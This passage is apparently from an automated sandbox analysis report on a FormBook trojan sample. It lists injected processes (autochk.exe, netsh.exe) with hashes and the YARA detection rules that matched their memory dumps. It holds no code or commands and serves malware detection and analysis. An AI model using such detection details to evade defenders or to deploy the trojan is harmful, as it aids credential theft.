                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Target ID:4
                                            Start time:01:09:38
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\autochk.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\SysWOW64\autochk.exe
                                            Imagebase:0xbd0000
                                            File size:871424 bytes
                                            MD5 hash:34236DB574405291498BCD13D20C42EB
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Target ID:5
                                            Start time:01:09:44
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\netsh.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\netsh.exe
                                            Imagebase:0x1280000
                                            File size:82944 bytes
                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            No disassembly